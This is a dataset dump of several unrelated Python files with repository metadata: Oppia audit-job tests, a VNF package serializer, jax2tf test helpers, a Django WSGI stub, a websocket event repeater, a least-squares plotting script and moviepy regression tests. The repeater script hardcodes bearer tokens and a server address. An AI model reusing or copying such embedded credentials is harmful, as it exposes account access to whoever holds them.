        attribute / extra attribute) are reported per command.

        NOTE(review): 'schmea' is a typo for 'schema' in the method name;
        left unchanged to keep the code byte-identical.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_story_node'
        }, {
            'cmd': 'delete_story_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_story_node check of '
                'StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'delete_story_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: node_id, '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_story_node check of StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_story_node\'} '
                'failed with error: The following required attributes '
                'are missing: node_id, title"]]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySummaryModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the StorySummaryModel audit job."""

    def setUp(self):
        """Seeds one topic with three stories, each with a description and
        a language code ('ar', 'en', 'en'), and fetches their summary
        models."""
        super(StorySummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        language_codes = ['ar', 'en', 'en']
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for index, story in enumerate(stories):
            story.description = 'story-test'
            story.language_code = language_codes[index]
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = story_models.StorySummaryModel.get_by_id('0')
        self.model_instance_1 = story_models.StorySummaryModel.get_by_id('1')
        self.model_instance_2 = story_models.StorySummaryModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.StorySummaryModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three summary models validate cleanly (including after an
        update to story '1')."""
        story_services.update_story(
            self.owner_id, '1', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySummaryModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-field relation
        check for that entity only."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySummaryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated "in the future" (via mocked datetime) fails the
        current-time check; stories 1 and 2 are deleted first."""
        story_services.delete_story(self.owner_id, '1')
        story_services.delete_story(self.owner_id, '2')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySummaryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # 13-hour-offset mock clock so last_updated exceeds the job run time.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the backing StoryModel must fail the story_ids field
        check of the summary model."""
        story_model = story_models.StoryModel.get_by_id('0')
        story_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        self.model_instance_0.story_model_last_updated = (
            story_model.last_updated)
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySummaryModel\', '
                '[u"Entity id 0: based on field story_ids having '
                'value 0, expect model StoryModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_node_count(self):
        """A node_count inconsistent with the story's (empty) node list
        fails the node count check."""
        self.model_instance_0.node_count = 10
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for node count check of '
                'StorySummaryModel\', [u\'Entity id 0: Node count: 10 does '
                'not match the number of nodes in story_contents dict: []\']]'
            ), u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_story_related_property(self):
        """A summary title that disagrees with the story's title fails the
        title field check."""
        self.model_instance_0.title = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for title field check of '
                'StorySummaryModel\', '
                '[u\'Entity id %s: title field in entity: invalid does not '
                'match corresponding story title field: title 0\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class UserSubscriptionsModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the UserSubscriptionsModel audit job."""

    def setUp(self):
        """Creates an owner and a user; the owner publishes three
        explorations ('0'-'2') and three collections ('3'-'5'); the user
        subscribes to all of them, to one feedback thread, and to the
        owner."""
        super(UserSubscriptionsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
            rights_manager.publish_exploration(self.owner, exp.id)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i
        ) for i in xrange(3, 6)]
        for collection in collections:
            collection_services.save_new_collection(self.owner_id, collection)
            rights_manager.publish_collection(self.owner, collection.id)
        thread_id = feedback_services.create_thread(
            'exploration', 'exp_id', None, 'a subject', 'some text')
        subscription_services.subscribe_to_thread(
            self.user_id, thread_id)
        subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
        for exp in explorations:
            subscription_services.subscribe_to_exploration(
                self.user_id, exp.id)
        for collection in collections:
            subscription_services.subscribe_to_collection(
                self.user_id, collection.id)
        self.process_and_flush_pending_tasks()
        self.job_class = (
            prod_validation_jobs_one_off.UserSubscriptionsModelAuditOneOffJob)

    def test_standard_operation(self):
        """Both users' subscription models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated UserSubscriptionsModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_get_external_id_relationship_failure(self):
        """Subscribing to a thread id with no backing
        GeneralFeedbackThreadModel fails the external id check.

        NOTE(review): '110211048197157141232' is presumably the hashed user
        id derived from USER_EMAIL in this test environment — confirm if
        the signup fixture changes.
        """
        nonexist_thread_id = 'nonexist_thread_id'
        subscription_services.subscribe_to_thread(
            self.user_id, nonexist_thread_id)
        expected_output = [
            (
                u'[u\'failed validation check for general_feedback_thread_ids '
                'field check of UserSubscriptionsModel\', '
                '[u"Entity id 110211048197157141232: based on '
                'field general_feedback_thread_ids having value '
                'nonexist_thread_id, expect model GeneralFeedbackThreadModel '
                'with id nonexist_thread_id but it doesn\'t exist"]]'),
            u'[u\'fully-validated UserSubscriptionsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
| true
| true
|
790c61e7caf3c5a4f8d9695f7cbfc3e62c4f4f4b
| 3,191
|
py
|
Python
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/archive-vfc-nfvo-catalog
|
24b92a2210c2063935d313f08e1da1e9cee45f3f
|
[
"Apache-2.0"
] | 1
|
2019-09-25T05:38:42.000Z
|
2019-09-25T05:38:42.000Z
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/archive-vfc-nfvo-catalog
|
24b92a2210c2063935d313f08e1da1e9cee45f3f
|
[
"Apache-2.0"
] | 3
|
2021-02-03T08:59:39.000Z
|
2022-03-18T02:18:12.000Z
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/modeling-etsicatalog
|
b16b4579ea80bf82fa497e4934b2bb8728845b58
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import serializers
from .checksum import ChecksumSerializer
class VnfPackageSoftwareImageInfoSerializer(serializers.Serializer):
    """Serializer for the VnfPackageSoftwareImageInfo data type (software
    image metadata of an on-boarded VNF package).

    Fix: the containerFormat help_text was a copy-paste from an unrelated
    terminationType field; it now describes the container format. All field
    names, choices, and required/nullable flags are unchanged.
    """

    id = serializers.CharField(
        help_text="Identifier of the software image.",
        required=True,
        allow_null=False,
        allow_blank=False
    )
    name = serializers.CharField(
        help_text="Name of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    provider = serializers.CharField(
        help_text="Provider of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    version = serializers.CharField(
        help_text="Version of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    checksum = ChecksumSerializer(
        help_text="Checksum of the software image file.",
        required=True,
        allow_null=False
    )
    containerFormat = serializers.ChoiceField(
        # Was: "terminationType: Indicates whether forceful or graceful
        # termination is requested." — copy-pasted from another field.
        help_text=(
            "Container format indicates whether the software image is in "
            "a file format that also contains container information."),
        choices=["AKI", "AMI", "ARI", "BARE", "DOCKER", "OVA", "OVF"],
        required=True,
        allow_null=True
    )
    diskFormat = serializers.ChoiceField(
        help_text="Disk format of a software image is the format of the underlying disk image.",
        choices=["AKI", "AMI", "ARI", "ISO", "QCOW2", "RAW", "VDI", "VHD", "VHDX", "VMDK"],
        required=True,
        allow_null=True
    )
    createdAt = serializers.DateTimeField(
        help_text="Time when this software image was created.",
        required=True,
        format=None,
        input_formats=None
    )
    minDisk = serializers.IntegerField(
        help_text="The minimal disk for this software image in bytes.",
        required=True,
        allow_null=True
    )
    minRam = serializers.IntegerField(
        help_text="The minimal RAM for this software image in bytes.",
        required=True,
        allow_null=True
    )
    size = serializers.IntegerField(
        help_text="Size of this software image in bytes.",
        required=True,
        allow_null=True
    )
    userMetadata = serializers.DictField(
        help_text="User-defined data.",
        child=serializers.CharField(
            help_text="KeyValue Pairs",
            allow_blank=True
        ),
        required=False,
        allow_null=True
    )
    imagePath = serializers.CharField(
        help_text="Path in the VNF package.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
| 32.896907
| 102
| 0.65246
|
from rest_framework import serializers
from .checksum import ChecksumSerializer
class VnfPackageSoftwareImageInfoSerializer(serializers.Serializer):
    """Serializer for the VnfPackageSoftwareImageInfo data type (software
    image metadata of an on-boarded VNF package).

    Fix: the containerFormat help_text was a copy-paste from an unrelated
    terminationType field; it now describes the container format. All field
    names, choices, and required/nullable flags are unchanged.
    """

    id = serializers.CharField(
        help_text="Identifier of the software image.",
        required=True,
        allow_null=False,
        allow_blank=False
    )
    name = serializers.CharField(
        help_text="Name of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    provider = serializers.CharField(
        help_text="Provider of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    version = serializers.CharField(
        help_text="Version of the software image.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
    checksum = ChecksumSerializer(
        help_text="Checksum of the software image file.",
        required=True,
        allow_null=False
    )
    containerFormat = serializers.ChoiceField(
        # Was: "terminationType: Indicates whether forceful or graceful
        # termination is requested." — copy-pasted from another field.
        help_text=(
            "Container format indicates whether the software image is in "
            "a file format that also contains container information."),
        choices=["AKI", "AMI", "ARI", "BARE", "DOCKER", "OVA", "OVF"],
        required=True,
        allow_null=True
    )
    diskFormat = serializers.ChoiceField(
        help_text="Disk format of a software image is the format of the underlying disk image.",
        choices=["AKI", "AMI", "ARI", "ISO", "QCOW2", "RAW", "VDI", "VHD", "VHDX", "VMDK"],
        required=True,
        allow_null=True
    )
    createdAt = serializers.DateTimeField(
        help_text="Time when this software image was created.",
        required=True,
        format=None,
        input_formats=None
    )
    minDisk = serializers.IntegerField(
        help_text="The minimal disk for this software image in bytes.",
        required=True,
        allow_null=True
    )
    minRam = serializers.IntegerField(
        help_text="The minimal RAM for this software image in bytes.",
        required=True,
        allow_null=True
    )
    size = serializers.IntegerField(
        help_text="Size of this software image in bytes.",
        required=True,
        allow_null=True
    )
    userMetadata = serializers.DictField(
        help_text="User-defined data.",
        child=serializers.CharField(
            help_text="KeyValue Pairs",
            allow_blank=True
        ),
        required=False,
        allow_null=True
    )
    imagePath = serializers.CharField(
        help_text="Path in the VNF package.",
        required=True,
        allow_null=True,
        allow_blank=False
    )
| true
| true
|
790c63efac271f58e148285b1f49e65a7b5b0f1f
| 1,945
|
py
|
Python
|
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-07-10T03:59:22.000Z
|
2021-07-10T03:59:22.000Z
|
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from typing import Any, Callable, Tuple
import tensorflow as tf # type: ignore[import]
from jax.config import config
from jax import dtypes
from jax.experimental import jax2tf
from jax import test_util as jtu
class JaxToTfTestCase(jtu.JaxTestCase):
    """Base class for jax2tf tests: dtype-aware comparisons between a JAX
    function and its TF conversion."""

    def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
        """Compares dtypes across JAX and TF dtypes. Overrides super method."""
        def _as_np_dtype(dt):
            # TF dtypes expose .as_numpy_dtype; numpy dtypes pass through.
            if isinstance(dt, np.dtype):
                return dt
            return dt.as_numpy_dtype

        dt_x = _as_np_dtype(jtu._dtype(x))
        dt_y = _as_np_dtype(jtu._dtype(y))
        # Without x64 enabled, JAX canonicalizes 64-bit dtypes down to
        # 32-bit; compare the canonical forms in that mode.
        if not config.FLAGS.jax_enable_x64 and canonicalize_dtypes:
            dt_x = dtypes.canonicalize_dtype(dt_x)
            dt_y = dtypes.canonicalize_dtype(dt_y)
        self.assertEqual(dt_x, dt_y)

    def ConvertAndCompare(self, func_jax: Callable, *args,
                          with_function: bool = False,
                          atol=None,
                          rtol=None) -> Tuple[Any, Any]:
        """Compares jax_func(*args) with convert(jax_func)(*args)."""
        converted = jax2tf.convert(func_jax)
        if with_function:
            # Optionally exercise the tf.function (graph) path.
            converted = tf.function(converted)
        reference = func_jax(*args)
        candidate = converted(*args)
        self.assertAllClose(reference, candidate, atol=atol, rtol=rtol)
        return (reference, candidate)
| 38.9
| 80
| 0.701285
|
import numpy as np
from typing import Any, Callable, Tuple
import tensorflow as tf
from jax.config import config
from jax import dtypes
from jax.experimental import jax2tf
from jax import test_util as jtu
class JaxToTfTestCase(jtu.JaxTestCase):
def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
def to_numpy_dtype(dt):
return dt if isinstance(dt, np.dtype) else dt.as_numpy_dtype
if not config.FLAGS.jax_enable_x64 and canonicalize_dtypes:
self.assertEqual(dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(x))),
dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(y))))
else:
self.assertEqual(to_numpy_dtype(jtu._dtype(x)),
to_numpy_dtype(jtu._dtype(y)))
def ConvertAndCompare(self, func_jax: Callable, *args,
with_function: bool = False,
atol=None,
rtol=None) -> Tuple[Any, Any]:
func_tf = jax2tf.convert(func_jax)
if with_function:
func_tf = tf.function(func_tf)
res_jax = func_jax(*args)
res_tf = func_tf(*args)
self.assertAllClose(res_jax, res_tf, atol=atol, rtol=rtol)
return (res_jax, res_tf)
| true
| true
|
790c641b1df01558b4d6684daf150ecb67a02a07
| 387
|
py
|
Python
|
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
"""
WSGI config for porta project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'porta.settings')
application = get_wsgi_application()
| 22.764706
| 78
| 0.782946
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'porta.settings')
application = get_wsgi_application()
| true
| true
|
790c64262f02cb1d9cb0e7ff120b22923f664d0b
| 2,257
|
py
|
Python
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 4
|
2019-10-29T21:53:13.000Z
|
2021-12-02T00:38:42.000Z
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 14
|
2020-05-28T16:39:30.000Z
|
2021-05-22T06:01:40.000Z
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 1
|
2020-01-31T00:00:42.000Z
|
2020-01-31T00:00:42.000Z
|
#!/usr/bin/env python3
# still in development
#
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
### end of repeat
except Exception as error:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
| 31.347222
| 251
| 0.692955
|
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
| true
| true
|
790c659a50c3d3b7ede5f45a212e71ef09b14018
| 1,442
|
py
|
Python
|
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | 1
|
2018-11-25T20:08:48.000Z
|
2018-11-25T20:08:48.000Z
|
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | null | null | null |
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
def gen_data(n, start=0, end=10):
x = np.linspace(start, end, n)
y = np.sin(10*x) - x*x
return y
def gen_data_osc(n):
return np.array([1024 + (-2)**(-i/100) for i in range(n)])
def gen_data_rand(n):
return np.random.randn(n) + 0.3*np.linspace(0, 10, n)
def calc_cov(X, Y):
return np.sum((X - np.average(X))*(Y - np.average(Y))) / (X.shape[0] - 1)
def angular_coef(X,Y):
return calc_cov(X,Y)/calc_cov(X,X)
def linear_coef(a, X, Y):
return np.average(Y) - a*np.average(X)
count = 100
end = 100
time = np.linspace(0, end, count)
data = gen_data(count)
delta = end / count
preds = []
kg_preds = []
kg_prediction = 0
for i in range(1, count):
a = angular_coef(time[:i], data[:i])
b = linear_coef(a, time[:i], data[:i])
prediction = (time[i]+delta)*a + b
preds.append(prediction)
avg_X = np.average(time[:i])
avg_Y = np.average(data[:i])
cov = calc_cov(time[:i], data[:i])
estimate = time*a + b
plt.scatter(time, data, label="Medições", color="#FF5850")
plt.scatter(time[1:], preds, label="Est. Min. Quad.", color="#62B21C")
plt.plot(time, estimate, label="Min. Quad. Final", color="#36A1FF")
plt.xlabel("Tempo")
plt.ylabel("Temperatura")
plt.title("Aproximação Por Minimos Quadrados")
# Place a legend to the right of this smaller subplot.
plt.legend()
plt.show()
| 24.862069
| 78
| 0.613731
|
import matplotlib.pyplot as plt
import numpy as np
def gen_data(n, start=0, end=10):
x = np.linspace(start, end, n)
y = np.sin(10*x) - x*x
return y
def gen_data_osc(n):
return np.array([1024 + (-2)**(-i/100) for i in range(n)])
def gen_data_rand(n):
return np.random.randn(n) + 0.3*np.linspace(0, 10, n)
def calc_cov(X, Y):
return np.sum((X - np.average(X))*(Y - np.average(Y))) / (X.shape[0] - 1)
def angular_coef(X,Y):
return calc_cov(X,Y)/calc_cov(X,X)
def linear_coef(a, X, Y):
return np.average(Y) - a*np.average(X)
count = 100
end = 100
time = np.linspace(0, end, count)
data = gen_data(count)
delta = end / count
preds = []
kg_preds = []
kg_prediction = 0
for i in range(1, count):
a = angular_coef(time[:i], data[:i])
b = linear_coef(a, time[:i], data[:i])
prediction = (time[i]+delta)*a + b
preds.append(prediction)
avg_X = np.average(time[:i])
avg_Y = np.average(data[:i])
cov = calc_cov(time[:i], data[:i])
estimate = time*a + b
plt.scatter(time, data, label="Medições", color="#FF5850")
plt.scatter(time[1:], preds, label="Est. Min. Quad.", color="#62B21C")
plt.plot(time, estimate, label="Min. Quad. Final", color="#36A1FF")
plt.xlabel("Tempo")
plt.ylabel("Temperatura")
plt.title("Aproximação Por Minimos Quadrados")
plt.legend()
plt.show()
| true
| true
|
790c65c42dd20d86f9f0074087714fdd05634d1a
| 2,722
|
py
|
Python
|
env/Lib/site-packages/tests/test_PR.py
|
L0dz/auto-post
|
91563235a74336e4326a13b142c05c6755e0cf47
|
[
"Apache-2.0"
] | null | null | null |
env/Lib/site-packages/tests/test_PR.py
|
L0dz/auto-post
|
91563235a74336e4326a13b142c05c6755e0cf47
|
[
"Apache-2.0"
] | 6
|
2019-12-17T13:32:08.000Z
|
2021-06-02T00:49:29.000Z
|
cineBot/lib/python3.6/site-packages/tests/test_PR.py
|
furkanalpereny/cineBot
|
cb93b6fc6ab25ba0601067f54b6824a8462f470d
|
[
"MIT"
] | null | null | null |
"""
Tests meant to be run with pytest
"""
import sys
import os
import pytest
from moviepy.editor import *
from moviepy.video.tools.interpolators import Trajectory
import sys
sys.path.append("tests")
import download_media
from test_helper import PYTHON_VERSION, TMP_DIR, TRAVIS
def test_download_media(capsys):
with capsys.disabled():
download_media.download()
def test_PR_306():
if TRAVIS:
return
#put this back in once we get ImageMagick working on travis-ci
assert TextClip.list('font') != []
assert TextClip.list('color') != []
with pytest.raises(Exception, message="Expecting Exception"):
TextClip.list('blah')
def test_PR_339():
if TRAVIS:
return
#in caption mode
overlay = TextClip(txt='foo',
color='white', font="Liberation-Mono",
size=(640, 480),
method='caption',
align='center',
fontsize=25)
#in_label_mode
overlay = TextClip(txt='foo', font="Liberation-Mono", method='label')
def test_PR_373():
result = Trajectory.load_list("media/traj.txt")
Trajectory.save_list(result, os.path.join(TMP_DIR, "traj1.txt"))
result1 = Trajectory.load_list(os.path.join(TMP_DIR,"traj1.txt"))
assert len(result[0].tt) == len(result1[0].tt)
for i in range(len(result[0].tt)):
assert result[0].tt[i] == result1[0].tt[i]
assert len(result[0].xx) == len(result1[0].xx)
for i in range(len(result[0].xx)):
assert result[0].xx[i] == result1[0].xx[i]
assert len(result[0].yy) == len(result1[0].yy)
for i in range(len(result[0].yy)):
assert result[0].yy[i] == result1[0].yy[i]
def test_PR_424():
# Recommended use
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
# Uses `col` so should work the same as above, but give warning
clip = ColorClip([1000, 600], col=(60, 60, 60), duration=10)
# Should give 2 warnings and use `color`, not `col`
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10, col=(2,2,2))
def test_PR_458():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip.write_videofile(os.path.join(TMP_DIR, "test.mp4"),
progress_bar=False, fps=30)
